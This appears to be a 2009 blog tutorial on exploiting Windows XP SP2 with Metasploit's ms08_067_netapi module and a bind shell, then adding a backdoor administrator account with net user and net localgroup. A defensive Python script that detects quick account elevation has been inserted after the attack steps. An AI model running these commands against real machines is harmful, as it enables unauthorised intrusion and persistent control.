
Sunday, June 14, 2009

How to hack windows XP sp2 with metasploit framework

After a long time I am writing this post. I was trying some hands-on with the Metasploit Framework. For the exercise I chose Fedora 9 as my attacker machine (because I like Fedora) and installed the framework with PostgreSQL DB support. For the machine to attack I chose a machine with Windows XP Service Pack 2. From this exercise I got a very interesting result, and that result even surprised me. The result was that I got an XP command prompt, and from that prompt I first created two users (one an administrator and the other normal). For a start I think this is OK. The procedure I followed is as follows. I started with nmap port scanning.
% nmap -A -T4 192.168.xxx.xxx
This scan gave me all the open ports on XP. After getting the open ports I used the framework to perform the actual attack. Open msfconsole in a terminal.
% msfconsole
Now run the following commands:
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOST 192.168.xxx.xxx
msf > set RPORT 445
msf > set PAYLOAD generic/shell_bind_tcp
Now run the final command to attack:
msf > exploit
Now, if you are lucky, you will get the following command prompt. Now you can do whatever you want to do.

To add a user from the command prompt, use the following command:
C:\WINDOWS\system32>net user testuser test123 /add
The message from the terminal:
"net user testuser test123 /add
The command completed successfully."

To make the user an administrator, use the following command:
C:\WINDOWS\system32>net localgroup Administrators /add testuser
or C:\WINDOWS\system32>net localgroup "Power Users" /add testuser (quotes required here)
The message:
"net localgroup Administrators /add testuser
The command completed successfully."

Now type exit at the command prompt to exit:
C:\Documents and Settings\Administrator\Desktop>exit
exit
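From the defender's side, the sequence shown above (a new local account created and then added to Administrators or Power Users within seconds) is exactly what a detection should alert on. The script below is an added example, not part of the original post: it correlates constructed sample Security log records in the XP/2003-era format (Event ID 624 "User Account Created", Event ID 636 "Security Enabled Local Group Member Added"); the one-line record layout and the field names are assumptions for this example.

```python
"""Flag local accounts that are created and then elevated within a short window.

Added example, not from the original post. Record format is assumed:
"<date> <time> <event id> Field=value Field=value ...". On Windows XP/2003
the relevant IDs are 624 (account created) and 636 (member added to a local
group); on Vista and later they are 4720 and 4732.
"""
import re

LINE_RE = re.compile(r"^(\S+ \S+) (\d+) (.*)$")
# Values may contain spaces ("Power Users"), so stop at the next "Key=".
FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")
PRIVILEGED_GROUPS = {"administrators", "power users"}

# Constructed sample log: testuser mirrors the post's commands; svc_backup is
# elevated hours after creation and should not be flagged by the default window.
SAMPLE_LOG = """\
2009-06-14 21:02:11 624 NewAccount=testuser Caller=Administrator
2009-06-14 21:02:40 636 Member=testuser Group=Administrators Caller=Administrator
2009-06-14 09:15:00 624 NewAccount=svc_backup Caller=Administrator
2009-06-14 17:30:02 636 Member=svc_backup Group=Administrators Caller=Administrator
2009-06-14 21:03:05 636 Member=testuser Group=Power Users Caller=Administrator
"""


def parse(log_text):
    """Yield (epoch_seconds, event_id, fields) for each well-formed record."""
    from datetime import datetime
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines instead of failing
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S").timestamp()
        yield ts, int(m.group(2)), dict(FIELD_RE.findall(m.group(3)))


def find_suspicious(log_text, window_seconds=600):
    """Return (account, group, seconds_after_creation) for each quick elevation."""
    events = list(parse(log_text))
    created = {f["NewAccount"].lower(): ts for ts, eid, f in events if eid == 624}
    hits = []
    for ts, eid, f in events:
        if eid != 636 or f.get("Group", "").lower() not in PRIVILEGED_GROUPS:
            continue
        member = f.get("Member", "").lower()
        if member in created and 0 <= ts - created[member] <= window_seconds:
            hits.append((member, f["Group"], int(ts - created[member])))
    return hits


if __name__ == "__main__":
    for account, group, secs in find_suspicious(SAMPLE_LOG):
        print(f"ALERT: {account} created and added to {group} after {secs}s")
```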

This is only the very beginning. There is still choosing modules, attacking with different payloads, etc.; there are lots of things to learn. I posted this here just because I thought it would help you to learn security.

PS: This post is just for learning purposes. Please do not use it in an unethical manner. Respect others' privacy.